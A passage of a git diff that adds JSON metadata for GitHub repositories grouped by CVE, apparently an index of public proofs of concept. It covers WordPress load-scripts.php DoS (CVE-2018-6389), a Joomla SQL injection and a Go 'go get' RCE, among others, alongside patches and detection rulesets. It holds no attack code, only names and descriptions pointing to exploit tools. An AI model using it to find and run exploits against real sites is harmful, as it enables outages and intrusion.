Wordpress wp-admin\/load-scripts.php file", + "fork": false, + "created_at": "2018-02-06T01:43:33Z", + "updated_at": "2018-02-08T01:19:57Z", + "pushed_at": "2018-02-06T01:46:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 120477120, + "name": "CVE-2018-6389", + "full_name": "safebuffer\/CVE-2018-6389", + "owner": { + "login": "safebuffer", + "id": 20618414, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20618414?v=4", + "html_url": "https:\/\/github.com\/safebuffer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safebuffer\/CVE-2018-6389", + "description": "CVE-2018-6389 Exploit In WordPress DoS ", + "fork": false, + "created_at": "2018-02-06T15:16:03Z", + "updated_at": "2024-08-12T19:36:04Z", + "pushed_at": "2018-02-06T15:36:29Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 79, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 120533146, + "name": "modsecurity-cve-2018-6389", + "full_name": "rastating\/modsecurity-cve-2018-6389", + "owner": { + "login": "rastating", + "id": 2500434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2500434?v=4", + "html_url": "https:\/\/github.com\/rastating", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rastating\/modsecurity-cve-2018-6389", + "description": "A ModSecurity ruleset for detecting potential attacks using CVE-2018-6389", + "fork": false, + "created_at": "2018-02-06T22:51:21Z", + "updated_at": "2023-01-28T12:14:07Z", + "pushed_at": "2018-02-07T01:05:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 120540306, + "name": "CVE-2018-6389", + "full_name": "knqyf263\/CVE-2018-6389", + "owner": { + "login": "knqyf263", + "id": 2253692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253692?v=4", + "html_url": "https:\/\/github.com\/knqyf263", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/knqyf263\/CVE-2018-6389", + "description": "WordPress DoS (CVE-2018-6389)", + "fork": false, + "created_at": "2018-02-07T00:20:57Z", + "updated_at": "2020-01-17T20:42:25Z", + "pushed_at": "2018-02-07T00:43:23Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 120617956, + "name": "cve-2018-6389-php-patcher", + "full_name": "JulienGadanho\/cve-2018-6389-php-patcher", + "owner": { + "login": "JulienGadanho", + "id": 18120161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18120161?v=4", + "html_url": "https:\/\/github.com\/JulienGadanho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JulienGadanho\/cve-2018-6389-php-patcher", + "description": "Patch Wordpress DOS breach (CVE-2018-6389) in PHP", + "fork": false, + "created_at": "2018-02-07T13:22:31Z", + "updated_at": "2018-12-02T15:55:12Z", + "pushed_at": "2018-02-13T08:19:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 120916403, + "name": "wordpress-CVE-2018-6389", + "full_name": "dsfau\/wordpress-CVE-2018-6389", + "owner": { + "login": "dsfau", + "id": 26786936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26786936?v=4", + "html_url": "https:\/\/github.com\/dsfau", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dsfau\/wordpress-CVE-2018-6389", + "description": "Metasploit module for WordPress DOS load-scripts.php CVE-2018-638", + "fork": false, + "created_at": "2018-02-09T14:37:44Z", + "updated_at": "2018-12-11T09:20:38Z", + "pushed_at": "2018-02-09T19:40:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 121636079, + "name": "CVE-2018-6389-FIX", + "full_name": "Jetserver\/CVE-2018-6389-FIX", + "owner": { + "login": "Jetserver", + "id": 16237996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16237996?v=4", + "html_url": "https:\/\/github.com\/Jetserver", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jetserver\/CVE-2018-6389-FIX", + "description": "Global Fix for Wordpress CVE-2018-6389", + "fork": false, + "created_at": "2018-02-15T14:00:14Z", + "updated_at": "2018-02-15T14:02:54Z", + "pushed_at": "2018-02-18T11:40:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 122881954, + "name": "PoC---CVE-2018-6389", + "full_name": "thechrono13\/PoC---CVE-2018-6389", + "owner": { + "login": "thechrono13", + "id": 23078415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23078415?v=4", + "html_url": "https:\/\/github.com\/thechrono13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thechrono13\/PoC---CVE-2018-6389", + "description": "Proof of Concept of vunerability CVE-2018-6389 on Wordpress 4.9.2", + "fork": false, + "created_at": "2018-02-25T22:06:05Z", + "updated_at": "2018-02-25T22:07:50Z", + "pushed_at": "2018-02-26T10:13:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 122955721, + "name": "cve-2018-6389", + "full_name": "BlackRouter\/cve-2018-6389", + "owner": { + "login": "BlackRouter", + "id": 15177510, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15177510?v=4", + "html_url": "https:\/\/github.com\/BlackRouter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BlackRouter\/cve-2018-6389", + "description": null, + "fork": false, + "created_at": "2018-02-26T10:45:27Z", + "updated_at": "2018-02-26T10:45:27Z", + "pushed_at": "2018-02-26T10:47:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 123245165, + "name": "PoC---CVE-2018-6389", + "full_name": "alessiogilardi\/PoC---CVE-2018-6389", + "owner": { + "login": "alessiogilardi", + "id": 36900296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36900296?v=4", + "html_url": "https:\/\/github.com\/alessiogilardi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alessiogilardi\/PoC---CVE-2018-6389", + "description": null, + "fork": false, + "created_at": "2018-02-28T07:14:54Z", + "updated_at": "2019-03-09T17:58:52Z", + "pushed_at": "2019-03-04T21:30:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 123487751, + "name": "wordpress-cve-2018-6389", + "full_name": "JavierOlmedo\/wordpress-cve-2018-6389", + "owner": { + "login": "JavierOlmedo", + "id": 15904748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15904748?v=4", + "html_url": "https:\/\/github.com\/JavierOlmedo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JavierOlmedo\/wordpress-cve-2018-6389", + "description": "CVE-2018-6389 WordPress Core - 'load-scripts.php' Denial of Service <= 4.9.4", + "fork": false, + "created_at": "2018-03-01T20:19:14Z", + "updated_at": "2018-03-19T20:05:40Z", + "pushed_at": "2018-03-07T20:11:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 123791550, + "name": "wordpress_cve-2018-6389", + "full_name": "m3ssap0\/wordpress_cve-2018-6389", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/wordpress_cve-2018-6389", + "description": "Tries to exploit a WordPress vulnerability (CVE-2018-6389) which can be used to cause a Denial of Service.", + "fork": false, + "created_at": "2018-03-04T13:33:15Z", + "updated_at": "2022-05-17T03:08:33Z", + "pushed_at": "2018-03-10T11:57:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2018-6389", + "exploit", + "security", + "security-tools", + "vulnerability", + "vulnerability-scanners", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 123796262, + "name": "Shiva", + "full_name": "s0md3v\/Shiva", + "owner": { + "login": "s0md3v", + "id": 26716802, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26716802?v=4", + "html_url": "https:\/\/github.com\/s0md3v", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s0md3v\/Shiva", + "description": "Improved DOS exploit for wordpress websites (CVE-2018-6389)", + "fork": false, + "created_at": "2018-03-04T14:25:09Z", + "updated_at": "2024-11-14T16:21:53Z", + "pushed_at": "2020-10-01T11:51:46Z", + "stargazers_count": 114, + "watchers_count": 114, + "has_discussions": false, + "forks_count": 61, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 61, + "watchers": 114, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 130395597, + "name": "Wordpress-Hack-CVE-2018-6389", + "full_name": "mudhappy\/Wordpress-Hack-CVE-2018-6389", + "owner": { + "login": "mudhappy", + "id": 7614944, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7614944?v=4", + "html_url": "https:\/\/github.com\/mudhappy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mudhappy\/Wordpress-Hack-CVE-2018-6389", + "description": null, + "fork": false, + "created_at": "2018-04-20T17:45:38Z", + "updated_at": "2018-04-20T17:48:12Z", + "pushed_at": "2018-04-20T17:48:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 132090592, + "name": "WP-DOS-Exploit-CVE-2018-6389", + "full_name": "armaanpathan12345\/WP-DOS-Exploit-CVE-2018-6389", + "owner": { + "login": "armaanpathan12345", + "id": 16278863, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16278863?v=4", + "html_url": "https:\/\/github.com\/armaanpathan12345", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/armaanpathan12345\/WP-DOS-Exploit-CVE-2018-6389", + "description": "WP-DOS-Exploit-CVE-2018-6389", + "fork": false, + "created_at": "2018-05-04T05:15:33Z", + "updated_at": "2023-09-27T19:50:58Z", + "pushed_at": "2018-05-04T05:19:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 146678844, + "name": "trellis-cve-2018-6389", + "full_name": "ItinerisLtd\/trellis-cve-2018-6389", + "owner": { + "login": "ItinerisLtd", + "id": 32365928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32365928?v=4", + "html_url": "https:\/\/github.com\/ItinerisLtd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ItinerisLtd\/trellis-cve-2018-6389", + "description": "Mitigate CVE-2018-6389 WordPress load-scripts \/ load-styles attacks", + "fork": false, + "created_at": "2018-08-30T01:25:20Z", + "updated_at": "2024-04-23T16:23:17Z", + "pushed_at": "2018-08-30T01:47:48Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ansible-galaxy", + "cve-2018-6389", + "security", + "trellis", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 12, + "score": 0, + "subscribers_count": 12 + }, + { + "id": 155115549, + "name": "Wordpress-DOS", + "full_name": "Zazzzles\/Wordpress-DOS", + "owner": { + "login": "Zazzzles", + "id": 16189557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16189557?v=4", + "html_url": "https:\/\/github.com\/Zazzzles", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zazzzles\/Wordpress-DOS", + "description": "Exploit for vulnerability CVE-2018-6389 on wordpress sites", + "fork": false, + "created_at": "2018-10-28T21:05:04Z", + "updated_at": "2024-08-12T19:42:49Z", + "pushed_at": "2018-11-01T06:45:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 164352797, + "name": "tvsz", + "full_name": "fakedob\/tvsz", + "owner": { + "login": "fakedob", + "id": 8687970, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8687970?v=4", + "html_url": "https:\/\/github.com\/fakedob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fakedob\/tvsz", + "description": "CVE-2018-6389 PoC node js multisite with proxy", + "fork": false, + "created_at": "2019-01-06T22:57:48Z", + "updated_at": "2024-03-18T11:22:59Z", + "pushed_at": "2019-01-06T23:37:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 220969745, + "name": "Wordpress-DOS-Attack-CVE-2018-6389", + "full_name": "vineetkia\/Wordpress-DOS-Attack-CVE-2018-6389", + "owner": { + "login": "vineetkia", + "id": 44500552, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44500552?v=4", + "html_url": "https:\/\/github.com\/vineetkia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vineetkia\/Wordpress-DOS-Attack-CVE-2018-6389", + "description": "load-scripts.php file, which purpose is to retrieve several JavaScript packages through one single request.", + "fork": false, + "created_at": "2019-11-11T11:48:03Z", + "updated_at": "2022-03-06T07:24:24Z", + "pushed_at": "2019-11-11T12:21:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 229576729, + "name": "CVE-2018-6389", + "full_name": "ianxtianxt\/CVE-2018-6389", + "owner": { + "login": "ianxtianxt", + "id": 45796484, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45796484?v=4", + "html_url": "https:\/\/github.com\/ianxtianxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ianxtianxt\/CVE-2018-6389", + "description": "CVE-2018-6389: WordPress <= 4.9.x 拒绝服务(DOS)漏洞", + "fork": false, + "created_at": "2019-12-22T14:03:32Z", + "updated_at": "2024-08-12T19:55:57Z", + "pushed_at": "2019-12-22T14:05:19Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 592241313, + "name": "CVE-2018-6389-FIX", + "full_name": "amit-pathak009\/CVE-2018-6389-FIX", + "owner": { + "login": "amit-pathak009", + "id": 72250138, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72250138?v=4", + "html_url": "https:\/\/github.com\/amit-pathak009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amit-pathak009\/CVE-2018-6389-FIX", + "description": "it is the official Fix of Wordpress CVE-2018-6389.", + "fork": false, + "created_at": "2023-01-23T09:44:16Z", + "updated_at": "2023-01-23T09:45:36Z", + "pushed_at": "2023-01-23T09:45:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6396.json b/2018/CVE-2018-6396.json new file mode 100644 index 0000000000..654d6b643e --- /dev/null +++ b/2018/CVE-2018-6396.json @@ -0,0 +1,33 @@ +[ + { + "id": 123634317, + "name": "joomla-cve-2018-6396", + "full_name": "JavierOlmedo\/joomla-cve-2018-6396", + "owner": { + "login": "JavierOlmedo", + "id": 15904748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15904748?v=4", + "html_url": "https:\/\/github.com\/JavierOlmedo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JavierOlmedo\/joomla-cve-2018-6396", + "description": "Joomla - Component Google Map Landkarten <= 4.2.3 - SQL Injection", + "fork": false, + "created_at": "2018-03-02T21:46:28Z", + "updated_at": "2022-11-09T17:59:22Z", + "pushed_at": "2018-03-07T20:13:21Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6407.json b/2018/CVE-2018-6407.json new file mode 100644 index 0000000000..aa4663b71f --- /dev/null +++ b/2018/CVE-2018-6407.json @@ -0,0 +1,38 @@ +[ + { + "id": 119438300, + "name": "ConceptronicIPCam_MultipleVulnerabilities", + "full_name": "dreadlocked\/ConceptronicIPCam_MultipleVulnerabilities", + "owner": { + "login": "dreadlocked", + "id": 7407033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7407033?v=4", + "html_url": "https:\/\/github.com\/dreadlocked", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dreadlocked\/ConceptronicIPCam_MultipleVulnerabilities", + "description": "[CVE-2018-6407 & CVE-2018-6408] Conceptronic IPCam Administration panel CSRF and Denial of Service", + "fork": false, + "created_at": "2018-01-29T20:36:54Z", + "updated_at": "2024-04-02T17:43:50Z", + "pushed_at": "2018-01-31T00:13:31Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "csrf", + "denial-of-service", + "disclosure", + "vulnerabilities" + ], + "visibility": "public", + "forks": 7, + "watchers": 9, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6479.json b/2018/CVE-2018-6479.json new file mode 100644 index 0000000000..1e8f677093 --- /dev/null +++ b/2018/CVE-2018-6479.json @@ -0,0 +1,64 @@ +[ + { + "id": 119714188, + "name": "netwave-dosvulnerability", + "full_name": "dreadlocked\/netwave-dosvulnerability", + "owner": { + "login": "dreadlocked", + "id": 7407033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7407033?v=4", + "html_url": "https:\/\/github.com\/dreadlocked", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dreadlocked\/netwave-dosvulnerability", + "description": "[CVE-2018-6479] Netwave IP Camera server vulnerable to Denial of Service via one single huge POST request.", + "fork": false, + "created_at": "2018-01-31T16:38:48Z", + "updated_at": "2024-08-12T19:35:55Z", + "pushed_at": "2018-02-01T20:08:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 460682978, + "name": "Tool_Camera_Exploit_Netwave_CVE-2018-6479", + "full_name": "LeQuocKhanh2K\/Tool_Camera_Exploit_Netwave_CVE-2018-6479", + "owner": { + "login": "LeQuocKhanh2K", + "id": 75305251, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75305251?v=4", + "html_url": "https:\/\/github.com\/LeQuocKhanh2K", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LeQuocKhanh2K\/Tool_Camera_Exploit_Netwave_CVE-2018-6479", + "description": null, + "fork": false, + "created_at": "2022-02-18T02:33:04Z", + "updated_at": "2022-02-18T02:33:52Z", + "pushed_at": "2022-02-18T03:12:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6518.json b/2018/CVE-2018-6518.json new file mode 100644 index 0000000000..4b44044dc7 --- /dev/null +++ b/2018/CVE-2018-6518.json @@ -0,0 +1,33 @@ +[ + { + "id": 131035487, + "name": "Composr-CMS-10.0.13-Cross-Site-Scripting-XSS", + "full_name": "faizzaidi\/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS", + "owner": { + "login": "faizzaidi", + "id": 12153050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12153050?v=4", + "html_url": "https:\/\/github.com\/faizzaidi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faizzaidi\/Composr-CMS-10.0.13-Cross-Site-Scripting-XSS", + "description": "Composr CMS 10.0.13 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2018-6518", + "fork": false, + "created_at": "2018-04-25T16:35:41Z", + "updated_at": "2020-07-17T05:22:18Z", + "pushed_at": "2018-04-25T16:37:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6546.json b/2018/CVE-2018-6546.json new file mode 100644 index 0000000000..659109678d --- /dev/null +++ b/2018/CVE-2018-6546.json @@ -0,0 +1,33 @@ +[ + { + "id": 129653418, + "name": "CVE-2018-6546-Exploit", + "full_name": "securifera\/CVE-2018-6546-Exploit", + "owner": { + "login": "securifera", + "id": 12126525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12126525?v=4", + "html_url": "https:\/\/github.com\/securifera", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securifera\/CVE-2018-6546-Exploit", + "description": "CVE-2018-6546-Exploit", + "fork": false, + "created_at": "2018-04-15T21:42:20Z", + "updated_at": "2024-08-12T19:37:47Z", + "pushed_at": "2018-04-15T21:59:34Z", + "stargazers_count": 41, + "watchers_count": 41, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 41, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2018/CVE-2018-6574.json b/2018/CVE-2018-6574.json new file mode 100644 index 0000000000..68a59bbc67 --- /dev/null +++ b/2018/CVE-2018-6574.json @@ -0,0 +1,2763 @@ +[ + { + "id": 127698499, + "name": "cve-2018-6574", + "full_name": "acole76\/cve-2018-6574", + "owner": { + "login": "acole76", + "id": 1920278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1920278?v=4", + "html_url": "https:\/\/github.com\/acole76", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acole76\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2018-04-02T03:34:29Z", + "updated_at": "2018-04-02T03:44:17Z", + "pushed_at": "2018-04-02T03:44:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 130792609, + "name": "Go-Get-RCE-CVE-2018-6574-POC", + "full_name": "neargle\/Go-Get-RCE-CVE-2018-6574-POC", + "owner": { + "login": "neargle", + "id": 7868679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7868679?v=4", + "html_url": "https:\/\/github.com\/neargle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/neargle\/Go-Get-RCE-CVE-2018-6574-POC", + "description": "CVE-2018-6574 POC : golang 'go get' remote command execution during source code build", + "fork": false, + "created_at": "2018-04-24T03:44:20Z", + "updated_at": "2023-08-07T02:33:23Z", + "pushed_at": "2022-01-14T07:28:59Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 24, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 133783468, + "name": "go-get-rce", + "full_name": "wb4r\/go-get-rce", + "owner": { + "login": "wb4r", + "id": 13272847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13272847?v=4", + "html_url": "https:\/\/github.com\/wb4r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wb4r\/go-get-rce", + "description": "CVE-2018-6574 for pentesterLAB", + "fork": false, + "created_at": "2018-05-17T08:32:40Z", + "updated_at": "2023-03-05T05:31:35Z", + "pushed_at": "2018-05-17T08:33:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 134137690, + "name": "go-get-rce", + "full_name": "ahmetmanga\/go-get-rce", + "owner": { + "login": "ahmetmanga", + "id": 25594206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25594206?v=4", + "html_url": "https:\/\/github.com\/ahmetmanga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmetmanga\/go-get-rce", + "description": "cve-2018-6574 @pentesterlab", + "fork": false, + "created_at": "2018-05-20T09:39:15Z", + "updated_at": "2018-05-20T09:40:53Z", + "pushed_at": "2018-05-20T09:40:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 134184478, + "name": "cve-2018-6574", + "full_name": "ahmetmanga\/cve-2018-6574", + "owner": { + "login": "ahmetmanga", + "id": 25594206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25594206?v=4", + "html_url": "https:\/\/github.com\/ahmetmanga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmetmanga\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2018-05-20T20:32:15Z", + "updated_at": "2018-05-20T20:33:17Z", + "pushed_at": "2018-05-20T20:33:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 155760240, + "name": "cve-2018-6574", + "full_name": "redirected\/cve-2018-6574", + "owner": { + "login": "redirected", + "id": 11227335, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11227335?v=4", + "html_url": "https:\/\/github.com\/redirected", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redirected\/cve-2018-6574", + "description": null, + "fork": false, + "created_at": "2018-11-01T18:44:35Z", + "updated_at": "2018-11-01T18:57:35Z", + "pushed_at": "2018-11-01T18:57:34Z", + 